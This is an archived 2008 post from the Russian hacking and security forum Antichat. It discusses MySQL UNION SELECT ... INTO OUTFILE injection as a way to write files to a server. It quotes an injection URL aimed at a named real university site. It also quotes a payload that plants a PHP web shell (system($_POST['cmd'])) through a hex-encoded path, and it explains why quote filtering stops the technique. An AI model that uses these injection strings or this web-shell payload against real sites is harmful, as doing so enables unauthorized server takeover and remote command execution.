ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО_OLD > Статьи > Авторские статьи

Опции темы Поиск в этой теме Опции просмотра

Старый 31.01.2008, 10:31
krypt3r
Познавший АНТИЧАТ
Провел на форуме:
3660186

Цитата:
http://research.udmercy.edu/ids/technoclass.php?id=99+UNION+SELECT+null,'text',nul l,null,null,null+from+table+into+outfile+'/tmp/file.php'/*
Уже говорилось на форуме, что в структуре SELECT...INTO OUTFILE наличие from table не является обязательным. Если не изменяет память, то from table требовалось в мускуле третьей версии

Цитата:
У меня вопрос, вот пример есть сайт но там стоит фильтр на кавычки. Я могу читать файлы только через SQL HEX такой если я пример зашифрую
/tmp/shell.php - без ковычик в SQL HEX
<?php system($_POST['cmd']);?> - SQL HEX и у меня получится так:
http://site.com/index.php?id=-1+union+select+1,2,тут зашифрованный шелл в SQL HEX,4,5,6+from+user+into+outfile+а тут зашифрованный /tmp/shell.php в SQL HEX (0x746d702f7368656c6c2e706870)/*

Это команда выполнится? То есть если у меня хватает прав на запись, то разницы нету в в SQL HEX я передаю или нет?
Эта команда не выполнится, если стоит фильтр на кавычки, ибо мускуль после INTO OUTFILE ждет строку, заключенную или в одинарные, или в двойные кавычки. Всякие sql-hex, char() и остальное работать не будет

Последний раз редактировалось krypt3r; 31.01.2008 в 10:35..